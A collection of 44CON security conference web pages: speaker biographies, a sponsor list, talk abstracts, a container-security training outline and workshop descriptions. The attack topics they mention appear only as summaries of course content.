          With a blend of technical skills and business acumen, a deep knowledge of information law including privacy, data protection and information rights, Graham holds the certifications CIPP/E, CISM, CRISC, MBCI and PCIP in addition to being a qualified accountant. He has recently graduated from Northumbria University with an LLM in Information Rights Law and Practice where his dissertation on the application of data protection regulations in the cloud computing landscape including cross jurisdictional boundary challenges received a distinction.

          Philippe Arteau

          Philippe is a security researcher working for GoSecure. He is the author of the Java static analysis tool Find Security Bugs. He is actively doing research to find new attack vectors and develop new tools. His experiences are both in the offensive and the defensive side, having the chance to do countless pentests and code reviews.

          He has also built many plugins for Burp and ZAP proxy tools (Reissue Request Scripter, Retire.JS, PDF Viewer, CSP Auditor, etc.). He has discovered many vulnerabilities in popular software including Google Chrome, Dropbox, Paypal, RunKeeper and Jira.

          Haroon Meer

          Haroon Meer is the founder of Thinkst, the company behind Canary. Haroon has contributed to several books on information security and has published a number of papers on various topics related to the field. Over the past decade (and a half) he has delivered research, talks, and keynotes at conferences around the world.

          Rogan Dawes

          Rogan is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies: WebScarab.

          In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header.

          Dominic White

          Dominic works at SensePost and tweets as @singe.

           

          Jacob Torrey

          Jacob Torrey is an Advising Research Engineer at Assured Information Security, Inc. where he leads the Computer Architectures group and acts as the site lead for the Colorado branch. Jacob has worked extensively with low-level x86 and MCU architectures, having written a BIOS, OS, hypervisor and SMM handler. His major interest is how to (mis)use an existing architecture to implement a capability currently beyond the limitations of the architecture. In addition to his research, Jacob volunteers his time organizing conferences in Denver (RMISC & BSidesDenver) and regular meet-ups across the front range.

          Kevin O’Reilly

          Kevin O’Reilly is a Principal Consultant and Head of Threat at Context Information Security. He is responsible for leading threat research and malware analysis within Context’s Response department. He has been working in information security for over 12 years. Prior to joining Context, he was previously Research Developer at Corsaire, after beginning his career as Virus Researcher at Anti-Virus firm Sophos.

           

          Olivier Bilodeau

          Olivier Bilodeau is the head of Cybersecurity Research at GoSecure, a consultancy firm specializing in cybersecurity services for the public and private sector.

          With more than 10 years of infosec experience, Olivier worked on Unix servers, managed enterprise networks, wrote open source network access control software and recently worked as a Malware Researcher at ESET. He likes to reverse engineer everything that crosses his path, participate in information security capture-the-flag competitions, hack open source code and brew beer. He has spoken at various conferences (Defcon, Botconf, VirusBulletin, Derbycon, … ), used to lecture on information security at ETS University in Montreal, drives the NorthSec Hacker Jeopardy and co-organizes the MontreHack capture-the-flag training initiative. His primary research interests include reverse-engineering tools, Linux and/or embedded malware and honeypots.

          You can follow Olivier on Twitter @obilodeau

          Marc-Etienne M.Léveillé

          Marc-Étienne has been a malware researcher at ESET since 2012. He specializes in malware attacking unusual platforms, whether it’s fruity hardware or software from south pole birds. Lately, Marc-Étienne was mostly reverse engineering server-side malware to discover their inner working and operation strategy. His research led to the publication of the Operation Windigo white paper that won Virus Bulletin’s Péter Szőr Award for best research paper in 2014.

          Outside his day job, Marc-Étienne enjoys designing challenges for the NorthSec CTF competition. He is also a co-organiser of the MontréHack monthly event. He presented at multiple conferences including CSAW:Threads, CARO Workshop and Linuxcon Europe. When he’s not one of the organizers, he loves participating in CTF competitions like a partying gentleman. Outside the cyberspace, Marc-Étienne plays the clarinet and reads comics. He tweets sporadically at @marc_etienne_.

          Saumil Shah

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 15 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, traveling around the world and taking pictures.

          Joe FitzPatrick

          Joe FitzPatrick has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences.

          You can follow Joe on Twitter too @securelyfitz

          Emil Tan

          Emil started his career in infosec as a researcher at Singapore’s Defence Science National Laboratories, focusing primarily in the area of intrusion detection and deception. He was later appointed security administrator at a Security Ops Centre in the Ministry of Defence, Singapore. Emil then pursued his BSc Computer Science and MSc Information Security at Royal Holloway, University of London.

          Emil is an active advocate in the infosec community. He founded Edgis, a special interest group, and is also a Chapter Member with The Honeynet Project. Apart from these commitments, he also actively gets himself involved in infosec groups and events such as BSides London, Null Singapore, etc.

          Emil’s infosec foundation is highly technical, however he was also involved in other interdisciplinary studies during his university years, e.g. Political Science, Communication Science, Geospatial Theory, Psychology, etc. Emil now enjoys viewing the infosec world through this multi-disciplinary lens.

          Rebekah Brown

          Rebekah is the threat intelligence lead for Rapid7 where her responsibilities include program architecture, management, analysis and operations. Rebekah has spent over a decade in the intelligence community; her previous roles include NSA network warfare analyst, Operations chief of a United States Marine Corps cyber unit, and a Cyber Command training and exercise lead. She has helped develop threat intelligence programs at the federal, state, and local level as well as in the private sector and is a co-author for the SANS Cyber Threat Intelligence course.

          Juan Perez-Etchegoyen

          Juan Perez-Etchegoyen leads the Product teams that keep Onapsis on the cutting-edge of the business-critical application security market. He is responsible for the design, research and development of Onapsis’ innovative software solutions, and helps manage the development of new products as well as the SAP cyber-security research that has garnered critical acclaim for the Onapsis Research Labs. He is regularly invited to speak and host training at global industry conferences including Blackhat, HackInTheBox, Troopers, and SAP TechEd/DCODE. Prior to joining Onapsis, Juan led many Information Security consultancy projects for companies in Latin America, the USA and Europe. His strongest experience is in the field of Penetration Testing, Web Application Testing, Vulnerabilities Research, Information Security Auditing and Standards.

          Nahuel D. Sanchez

          Nahuel D. Sanchez is a security researcher at Onapsis. Being a member of Onapsis Research Labs, his work focuses on performing extensive research of SAP products and components, identifying and reporting security vulnerabilities, attack vectors and advanced exploitation techniques that are applicable to different platforms. Nahuel is one of the most frequent reporters of vulnerabilities in SAP products and is a frequent author of the publication “SAP Security In-Depth”. He previously worked as a security consultant, evaluating the security of Web applications and participating in Penetration Testing projects. His areas of interest include Web security, reverse engineering, and the security of Business-Critical applications.

          Azhar Desai

          Azhar writes and runs software with a security bent at Thinkst, an applied research company focusing on information security. He has, in the past, had fun presenting with others from Thinkst at conferences such as Troopers (2015) and HITB KL (2014).

          Nicholas Rohrbeck

          Nick is a software developer at Thinkst Applied Research. Before arriving at Thinkst, he was primarily a Java developer, but now his days are filled with Python, network security research, DevOps tinkering and (badly) playing Go.

           

           

          Ian Trump

          Ian Trump, CD, CPM, BA is an ITIL certified Information Technology (IT) consultant with 20 years of experience in IT security and information technology. As a project and operational resource, Ian has functioned as an IT business analyst, project coordinator and as a senior technical security resource as required. Ian’s broad experience on security integration projects, facilitating technological change and promoting security best practices have been embraced and endorsed by his industry peers.

          From 1989 to 1992, Ian served with the Canadian Forces (CF), Military Intelligence Branch; in 2002, he joined the CF Military Police Reserves and retired as a Public Affairs Officer in 2013. His previous contract was managing all IT projects for the Canadian Museum of Human Rights (CMHR). CMHR is the first museum solely dedicated to the evolution, celebration and future of human rights – it is the first national museum to be built in nearly half a century, and the first outside the National Capital Region.

          Currently, Ian is the Global Security Lead at LogicNow working across all lines of business to define, create and execute security solutions to promote a safe, secure Internet for Small & Medium Business world wide.

          Evan Booth 

          Evan Booth loves to build stuff out of other stuff. As an engineer for Skookum, a full service software development company in Charlotte, North Carolina, he works to solve a variety of business problems through the creative use of technology. As a human for Earth, he tends to break things for curiosity’s sake.

          Throughout 2013 and into 2014, in an effort to highlight hypocrisy and “security theater” brought about by the TSA, through a research project called “Terminal Cornucopia,” Evan created an arsenal ranging from simple, melee weapons to reloadable firearms to remotely-triggered incendiary suitcases—all solely comprised of items that anyone can purchase inside most airport terminals *after* the security checkpoint.

          Given the right ingredients, a big cardboard box can be a time machine, spaceship, minecart, or a telephone booth that only calls people named “Steve” who live in the future.

          Jerry Gamblin

          Jerry Gamblin’s passion for security was ignited in 1989 when he hacked Oregon Trail to give himself the highest score in history in the world on his 3rd grade teacher’s Apple IIe.

          As a (mostly) grown up security evangelist and analyst, he has been featured on numerous blogs, podcasts and has spoken at security conferences around the world on keeping companies secure.

          When he’s not helping companies be more secure, you can find him taking his son to swim lessons or learning how to solder.

          You can read his latest thoughts at jerrygamblin.com.

          Guanxing Wen

          Guanxing Wen is a member of Pangu Team. His focus includes performing root-cause analysis, fuzzing and exploit development. Prior to joining Pangu, Wen worked as a security researcher of Venustech ADlab. He is actively involved in Bug Bounty Program, such as ZDI, Chrome VRP and is currently the top one bug contributor of IBB-Flash Bounty (@hhj4ck).

          #####EOF##### 44CON 2014 Sponsors – 44CON

          44CON 2014 Sponsors

          Platinum Sponsor

          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          Gold Sponsors

          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          MWR InfoSecurity is proud to be supporting 44CON 2013! Having been involved in 44CON from the beginning, MWR is keen to continue its long standing relationship with the UK’s premier security conference. As a company we invest heavily in knowledge sharing and we are proud to be a part of an event that provides a platform for discussion on the latest thinking and research in the InfoSec arena.

          Akamai

          http://www.akamai.com

          Akamai® is a leading provider of cloud services for delivering, optimising and securing online content and business applications. At the core of the Company’s solutions is the Akamai Intelligent Platform™ providing extensive reach, coupled with first class reliability, security, visibility and expertise. Akamai enables enterprises to securely leverage the cloud, avoid data theft and downtime and protect from increasing frequency, scale and sophistication of Web attacks.

          Thales

          https://www.thalesgroup.com/

          Thales is a global technology leader in the Aerospace, Transportation and Defence & Security markets. In 2013, the company generated revenues of €14.2 billion with 65,000 employees in 56 countries. With its 25,000 engineers and researchers, Thales has a unique capability to design, develop and deploy equipment, systems and services that meet the most complex security requirements. Thales has an exceptional international footprint, with operations around the world working with customers and local partners. Thales UK employs 7,500 staff based at 35 locations. In 2013 Thales UK’s revenues were around £1.3 billion.

          Silver Sponsors

          Context Information Security

          http://www.contextis.com

          Context is an independently operated cyber security consultancy, founded in 1998 and focusing on providing highly skilled consultants to help organisations with their information security challenges. We work with some of the world’s most high profile blue chip companies and government organisations.

          IronKey

          http://www.ironkey.com

          Imation’s IronKey mobile security solutions protect sensitive data. Advanced authentication and encryption meet compliance requirements, deploy secure workspaces that go anywhere employees do and allow you to maintain control of confidential data. IronKey solutions meet the challenge of protecting today’s mobile workforce, featuring secure USB solutions for data transport and mobile workspaces.

          Microsoft

          http://www.microsoft.com/security

          Microsoft is proud to be a sponsor of the 44CON Security Conference. 44CON provides a forum in which security researchers from all over the world, IT pros, and industry luminaries can share insights, knowledge and information to advance security research. We’re happy to be here and glad to be part of the community.

          Other Event Sponsors

          Digital Shadows

          http://www.digitalshadows.com

          Digital Shadows is a cyber intelligence company that protects organisations from data loss and targeted cyber attack. By applying our award-winning blend of expertise and technology we enable organisations to exploit social, cloud and mobile technologies while keeping their security and reputations intact. Our managed services monitor millions of data sources across the visible and dark web to deliver focussed, relevant intelligence about the risks you need to mitigate.

          alien8 Security

          http://alien8security.com

          Exclusive providers of Immunity’s Canvas and Silica in Europe and Digital Shadows Partner. Immunity’s CANVAS is ground breaking software that allows you to test compliance and let your organization discover how vulnerable you really are and SILICA helps you understand the vulnerabilities of your WiFi network.

          Digital Shadows is a cyber intelligence company that protects organisations from data loss and targeted cyber attack. Contact security@alien8security.com for quotes and to find out more.

          Mandalorian

          http://www.mandalorian.com

          Mandalorian are an independent UK-based provider of information security services with specialisms in penetration testing and malware analysis. We focus on being the easiest supplier you’ve ever worked with and being fanatical about the quality of our work.

          Logically Secure

          No Starch Press

          http://nostarch.com

          No Starch Press has long had a reputation for publishing unique books on technology, with a focus on open source, security, hacking, programming, alternative operating systems, LEGO®, science, and math.

          Tiger Scheme

          http://tigerscheme.org

          Tiger Scheme is an independent certification scheme that gives those commissioning security testing services confidence that they are hiring an individual or company that has been assessed to the highest standards. Tiger Scheme provides career progression through intermediate and senior level certification and technical specialist roles.

          BlackBerry

          http://www.blackberry.com/security

          BlackBerry Security works to make BlackBerry® one of the most secure mobile platforms available. BlackBerry Security builds collaborative relationships across the industry, monitors the security threat landscape and responds rapidly to emerging incidents to provide customers with the guidance and tools they need to protect their systems and devices.

          Halon Security

          http://www.halon.se/

          Halon Security is a prominent developer of bi-directional e-mail control and security. The company was founded in 2002 and is known for its award-winning e-mail security solutions, which are used by large hosting providers, non-commercial and government organizations, municipalities and companies of all sizes. Protecting millions of users world-wide, Halon is known for its quality and excellence.

          CREST

          http://www.crest-approved.org

          CREST is a not-for-profit organisation that represents the technical information security industry, primarily penetration testing, cyber security incident response and security architecture services.

          CREST offers public and private sector organisations an assurance that the technical security advisors they appoint are competent, qualified and professional with current knowledge. It also ensures that the CREST member companies they engage with have the appropriate processes and controls in place to perform the services for which they have been appointed and protect sensitive client-based information.

          Qualys

          http://www.qualys.com/

          Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of cloud security and compliance solutions with over 6,700 customers in more than 100 countries, including a majority of each of the Forbes Global 100 and Fortune 100. The QualysGuard Cloud Platform and integrated suite of solutions help organizations simplify security operations and lower the cost of compliance by delivering critical security intelligence on demand and automating the full spectrum of auditing, compliance and protection for IT systems and web applications. Founded in 1999, Qualys has established strategic partnerships with leading managed service providers and consulting organizations including Accuvant, BT, Dell SecureWorks, Dimension Data, E-Cop, Fujitsu, HCL, NTT, Symantec, Verizon and Wipro. The company is also a founding member of the Cloud Security Alliance (CSA) and a Premium Corporate Member of OWASP.

          COSEINC

          http://www.coseinc.com

          COSEINC is a Singapore based and privately funded company dedicated to providing highly specialized information security services to our clients. Founded in 2004, we are a young and dynamic company whose constitution are computer security experts, from diverse backgrounds and geographies, with distinguished credentials and experience.

          It is our aim to provide our clients with the most professional and competent expertise and services at the most reasonable rates so that they can achieve the highest returns on their information technology investment.

          PenTest Partners

          http://www.pentestpartners.com

          Pen Test Partners LLP is a CHECK & CREST accredited pen testing company that is approved by the PCI Council to undertake card breach work as a PCI PFI. We investigate roughly half of all credit card data breaches in the UK which provides us with excellent real-time threat intelligence, used to augment our testing. We are a limited liability partnership for a very good reason; being in a partnership means that our people are heavily invested in the company. It’s that employee ownership which inspires and drives the quality in what we do.

          Nettitude

          http://www.nettitude.co.uk/penetration-testing/

          Nettitude is a cyber security and risk management consultancy that provides businesses and public sector organisations with governance, risk management and compliance services. Counting many of the FTSE 350 among its customers, Nettitude specialises in helping companies and organisations that can least afford to fall victim to a security breach due to the value of the data they hold, or the strict compliance regulations governing their industries.

          PQChat

          https://pq-chat.com

          PQChat is the world’s first commercially available post-quantum instant messenger based on the Robert McEliece cryptosystem. Every message you send has a different encrypted output.

          Our mission is to empower our users so you can take back control of your data and digital life. All the data belongs to you, privately and securely. Our business model is not based on data mining you, your data or your on/offline behaviour.

          Media Partners

          IT Security Guru

          http://itsecurityguru.org

          IT Security Guru is a website containing industry news, blogs, videos, jobs and links to the best stories on the internet. Every day we look at the big stories, talk to the key people and bring the main topics to the end-user audience. Since we relaunched our website in January 2014 we have been delighted to support community events such as 44CON and we look forward to being involved in the build up to the show and attending the conference in September.

          Restricted Intelligence

          http://www.restrictedintelligence.co.uk

          Restricted Intelligence has been making entertaining films for business for more than a quarter of a century, long before the term ‘content marketing’ had even been invented. More recently we were approached by two global organisations (in the same month) asking us to communicate the fundamentally dry subject of ‘information security’ to their many thousands of globally dispersed employees. We like a challenge. That’s when this all started.

          Event Partners

          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.
          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### 44CON CYBER SECURITY 2015 Presentations – 44CON

          44CON CYBER SECURITY 2015 Presentations

          Presentation and Communication Skills for Security Professionals (Alternative Title: Hacking the Conversation)

          Presented By: Jerry Gamblin

          How you communicate in meetings, emails, presentations and hallway talks can make the difference between running a successful security program and a struggling one.

          Jerry has spent the better part of the last 10 years working on being a better communicator and will share some of the tactics that have (and haven’t) worked for him with you.

          track: Technical


          Law Enforcement and Technology, how is the future looking?

          Presented By: Ian Maxted

          As law enforcement deals with the ever increasing complexities of technological growth, necessary skillsets, technical implementation and legislation can be a stumbling block not just for industry.

          It is widely considered that law enforcement are typically well behind the curve when it comes to cyber criminality. Ian will look at how that appetite has changed and how industry becomes pivotal to helping the police service fulfil its guardianship status, now that the Internet is firmly in our daily lives.


          Cyber Myths and Monsters: how to raise awareness and change behaviour

          Presented By: Jessica Barker

          Cyber insecurity often feels like a horror story, and the idea of cyber security an out-of-reach myth. The last year has seen breaches that are bigger, and of a higher profile, than ever before. When we trace these breaches back to their cause, we often find that attackers took advantage of human behaviour, via social engineering, poor password management, gaps in physical security or malicious insiders. Organisations are increasingly focused on raising cyber security awareness, and the UK government has spent millions of pounds on the Cyber Streetwise campaign, and yet we seem to be making little (if any) progress when it comes to changing behaviours.

          Jessica’s talk argues that, in lots of ways, we are making fundamental mistakes when it comes to our attempts to raise awareness. Combining sociological and psychological research with mythology and classic horror fiction, this talk highlights lessons we can learn in our approach to raising cyber security awareness. Emphasising ways we can positively engage with users to change behaviours for the better, this talk aims to provoke ideas and discussions that will lead to awareness-raising programmes that are focused on what the user needs to know, and how we should be telling them, to achieve the most impact and make cyber security less of a monster.


          Not following the herd – how to make your voice matter in the corporate world

          Presented By: Quentyn Taylor

          First Quentyn will look at how to make your voice heard and relevant to a modern fast paced business. He will look at building a security message and making it count, challenging commonly held perceptions in risk and always being aware of the echo chamber.


          Pitfalls of Public Cyber Data

          Presented By: Phil Huggins & Ernest Lee

          There are increasingly many data-driven cyber reports published and these are being relied upon to support strategic cyber decision-making in organisations. In order to conduct a meta-analysis of reported cyber data to support the development of a strategic cyber threat assessment at Stroz Friedberg we reviewed the quality of available data and reports. Here we will highlight some of the pitfalls inherent in these sources that should be considered when using them and make some recommendations for the publication of data-driven cyber reports.


          Legal Drivers in Cyber Security: Many or None?

          Presented By: Dai Davis

          What are the real drivers for Cyber Security? Certainly not the Data Protection legislation, which, while theoretically being enforceable with a fine of up to £500,000, is rarely enforced. Most breaches of that legislation go unnoticed, let alone invoke a sanction. Most businesses will retort that they are concerned about their reputation, but does the truth match the perception? Dai explores the dangers of lack of security and what businesses can and do suffer as a result of lack of security. Criminal sanctions in the form of the Computer Misuse Act, 1990 are examined as is the civil fining regime of the Data Protection legislation. There is also the possibility under this latter data protection legislation for an aggrieved individual to claim damages, but as Dai shows, this also is a theoretical rather than a practical remedy. Dai examines the purely economic risk of “loss of reputation” as well as the special case of businesses falling under the remit of the Financial Conduct Authority. Dai will also examine the implications of lack of security in the Internet of Things and whether there are legislative or other drivers to make the Internet of Things secure.


          Security from Necessity

          Presented By: Joe Goodings

          How working for Greenpeace has influenced my thoughts on information security.  I set out these ideas and give a small case study showing them in operation. Then open up for discussion on the pros & cons of the approach.


          The current picture (literally) of European Cyber Crime

          Presented By: Kevin Williams

          Kevin will present data from Team Cymru that gives an insight into the current real threats against the UK in comparison to the rest of Europe.


          ILEC Conference Centre

          One of the largest Conference-Hotels in West London, ILEC Conference Centre offers a capacious and flexible event hall at around 1500sqm in a single space as well as 5 additional syndicate rooms.

          Free secure wireless networking will be available to all attendees and sponsors in the conference area.

          The conference centre is a short walk from the West Brompton and Earls Court Underground Stations. Hyde Park, Kensington Palace and Gardens, The Royal Albert Hall, The Natural History Museum, Science and Victoria & Albert Museums are a short walk away for your security conference tourism convenience! With the rest of central London within easy reach.


          Mastering Container Security

          Presented By: Rory McCune

          Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

          This course breaks down the fundamental components of Docker and Linux containers, showing how they work together to create isolated environments for applications.

          We’ll also be covering fundamental Linux security concepts such as namespaces, cgroups, capabilities and seccomp, along with showing how to secure (or break into) container-based applications.

          The course will then move on to the world of container orchestration and clustering, looking at how Kubernetes works and the security pitfalls that can leave the clusters and cloud-based environments which use containers exposed to attack.

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Guidance on how to effectively use Docker to build secure and performant container images.
          • Details on how Linux containers are constructed and secured, including cgroups, namespaces, capability and seccomp filtering.
          • Hardening guidance for Docker Engine instances.
          • Introduction to container clustering and orchestration with Docker Swarm.
          • Secure configuration and attacks of Kubernetes clusters.
          • Techniques for effectively assessing the security of container images.

          Course Outline

          Day 1:

          • Docker Basics
          • Using Docker – This starts with basic Docker commands to familiarise students with how they work.
          • Docker networking – A look at how Docker networking operates and the options available that can be used to help isolate potentially dangerous containers.
          • Creating Docker Images – Covering how to create Docker images with examples around security tool creation.
          • Container Fundamentals – This delves into Linux container primitives, such as namespaces, cgroups, capabilities and seccomp filtering, essentially showing how container security is applied.
          • Docker Security – This looks at primary security concerns around the use of Docker Engine, including common pitfalls and how to attack or mitigate them.
          • Extras – Depending on how fast the students have been working through the day’s content, some extras can be covered, such as looking at the wider Docker ecosystem and some tooling to help manage containers more easily.

          Day 2:

          • Docker Swarm – this looks at the in-built Docker container orchestration platform, Docker Swarm, how its security is implemented and common weaknesses that might be exploited by attackers to compromise it.
          • Introduction to Kubernetes – Here we’ll cover the Kubernetes container orchestration platform and look at how it’s architected and composed. The goal is to familiarise students with how the platform operates so they can understand key areas of security concern/points of attack.
          • Kubernetes Security – This module looks at three major threat models for Kubernetes clusters (external attackers, compromised containers, and malicious users) and walks through the likely attack paths that each would take, showing practical approaches to exploiting Kubernetes security weaknesses.
          • Openshift and Amazon ECS – A quick look at some of the other commonly encountered options for containerization and possible security concerns in each of these.

          Target Audience

          Security employees, from both blue teams (internal defence) and red teams (external testers) who are looking to get a better understanding of containerisation and its security concerns.

          Student Requirements

          The course assumes a reasonable level of familiarity with Linux basics, but no familiarity with containerisation.

          What to Bring

          • Working laptop where you have administrator rights

          Software Requirements

          • Linux / Windows / Mac OS X desktop operating systems
          • SSH client capable of using key based logins

          Students will be provided with

          Copies of the course including all exercises and Virtual Machine images used during the course.

          About the Trainer

          LEAD INSTRUCTOR – Rory McCune @raesene

          Rory has worked in the Information and IT Security arena for the last 18 years in a variety of roles, from financial services, to running a small testing company, to working for large companies as a consultant. These days he spends most of his work time on application, cloud and container security.

          He’s an active member of the UK InfoSec community and has been presenting at security and general IT conferences for the last 8 years, including having the accolade of, currently, being the only person to have spoken at all the UK BSides conferences. When he’s not working he can generally be found out and about enjoying the scenery in the Highlands of Scotland, if the midgies aren’t biting!

          Book your 44CON 2019 training course now!


          44CON Assistance tickets

          Would you like to attend 44CON but don’t have the means to make it happen?

          We realise that not everyone is able to fund their own conference attendance. In partnership with our sponsors, we’ve launched an assistance program to provide the opportunity to attend 44CON to those who wouldn’t be able to come otherwise.


          We are pleased to announce that the first Assistance Sponsor for 44CON 2019, sponsoring two tickets, is Wire Security bvba. Watch this space for details of the 2019 assistance program and application process.

          The fine print:

          • Details provided for assistance ticket applications will be used for the selection process, event registration and hotel reservations in line with the 44CON Privacy Policy.
          • Assistance tickets are not transferable.
          • Attendance to the event is subject to the 44CON house rules.

          Win CRESTCon 2019 Tickets!

          We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

          CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

          To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

          Some of the talks we’re most looking forward to at this year’s CRESTCon include:

          • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
          • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
          • Martin Jordan – Austerbury: Iranian cyber threat briefing

          Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!


          44CON 2018 Workshops

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          Bug Bounties: An introduction and path way to winning at bug bounties

          Presented by: Shubham Shah and Nathan Wakelam

          Today we finally live in a world where we can hack into a diverse range of companies, legally, whenever we want, and get paid for it!

          This workshop is primarily for pentesters wanting to learn about the entire process of participating in bug bounties and how to do it well. This workshop will help participants with the following:

          • Which company do I hack, and which platform or program is right for me?
          • How do I (better) discover assets owned by an organisation to maximise attack surface?
          • How does bug bounty hunting differ from pentesting? (while they share similarities, the methodologies for finding bugs can be vastly different)
          • How do I write a good bug bounty report? (including platform specific tips and many examples)
          • How far do I go when I find a security issue to prove its severity? (mostly based off my experience in this tricky area)
          • What should I expect from a bounty and what do they expect from me? (maintaining good relationships with bounty programs)

          (60 minute workshop)

          Windows Internals and Local Attack Surface Analysis using Powershell

          Presented by: James Forshaw

          Inspecting the internals of Microsoft Windows and discovering interesting attack surfaces for local privilege escalation can be a dark art. Outside of trivial enumeration and fuzzing of drivers there’s little documentation about how you’d find interesting privileged attack surfaces such as brokers, internal RPC/DCOM services and badly configured applications to escape sandboxes and get administrator privileges.

          In this workshop we’ll go through how to use a number of PowerShell tools such as NtObjectManager (https://www.powershellgallery.com/packages/NtObjectManager) that I’ve written to help identify interesting attack surfaces and from that extracting information through reverse engineering to discover how they can be exploited. The workshop will also contain an overview of important areas of Windows internals as they relate to privilege escalation and how PowerShell can give you a better understanding of how these internal features work together.

          Note this will be a 4 hr workshop rather than a 2 hr one.

          Orange is the new Hack: Introduction to Machine Learning with Orange

          Presented by: Philippe Arteau

          Analyzing a large number of security alerts can be repetitive and tedious. To help cope with the growing complexity of systems, analysts can use machine learning algorithms and other data analysis concepts. By doing prediction, machine learning algorithms can help prioritize and even reduce the amount of manual work needed. Data analysis can also help gain a better understanding of our data.
          The workshop will introduce participants to the world of machine learning using the software Orange. A security-related scenario will be used for the hands-on exercises. For this scenario, a large dataset of vulnerabilities from web applications reported by a static analysis tool will be used. The dataset of vulnerabilities was enriched with key metadata that will help the algorithms. Some metadata will need transformation. Based on issues that were classified, it will be possible to predict which unclassified issues are likely to be actual vulnerabilities.
          The attendees will be able to apply the same principles to datasets in other contexts such as malware classification, system alert classification, vulnerability management, etc.

          Breaking (All) Applications With Frida

          Presented by: Jay Harris

          Frida is a framework which allows us to inject JavaScript into running applications. This has made reverse engineering and modifying applications easier than ever. Although Frida has a large following amongst mobile application testers, Frida also supports desktop applications and with not much effort it is possible to profile, debug and patch code.

          This 2 hour workshop will go through the basics of using Frida on Linux and Android and through exercises and walkthroughs show how Frida can be used to rapidly reverse engineer applications to understand logic flow, dump secrets and bypass security controls.

          Although what we look at here is relevant to mobile applications, this is not a mobile hacking workshop (in fact, most exercises will take place on Linux binaries) but might be useful to mobile testers looking to take their security testing to the next level.

          Advanced Wireless Attacks Against Enterprise Networks

          Presented by: Gabriel Ryan

          This workshop will instruct attendees on how to carry out sophisticated wireless attacks against corporate infrastructure. Attendees will learn how to attack and gain access to WPA2-Enterprise networks, bypass network access controls, and perform replay attacks to gain administrative control over an Active Directory environment. External wireless adapters and networking hardware will be provided to all workshop attendees, and material learned in the lectures will be practiced within a realistic lab environment.

          Areas of focus include:

          • Wireless reconnaissance and target identification within a red team environment
          • Attacking and gaining entry to WPA2-EAP wireless networks
          • LLMNR/NBT-NS Poisoning
          • Firewall and NAC Evasion Using Indirect Wireless Pivots
          • MITM and SMB Relay Attacks
          • Downgrading modern SSL/TLS implementations using partial HSTS bypasses

          ARM IoT Firmware Emulation Workshop

          Presented by: Saumil Shah

          Learn how to build your own testing and debugging environment for analysing IoT firmware images. Bug hunting in IoT firmware requires access to debugging, instrumentation and reverse engineering tools.

          In this workshop, we shall learn how to extract firmware from a few ARM IoT devices, deploy the extracted filesystems on an ARM QEMU environment, and emulate the firmware as close to the original hardware environment as possible. We shall also learn how to intercept and emulate NVRAM access to faithfully reproduce the exact configuration available on the actual device. Participants are required to bring a laptop capable of running VMware Workstation/Fusion/Player. We shall distribute a virtual machine with ARM QEMU along with firmware images extracted on the spot from a few SoHo routers and IP Cameras.

          The methodology discussed in this workshop is put together from the author’s own beats. While we use ARM as the base platform, the same methodology can also work for MIPS or other embedded architectures.

          Length: 2 hours
          Skill level: Intermediate

          Developing Exploits with Scratch Workshop

          Presented by: Kevin Sheldrake and Tim Todd

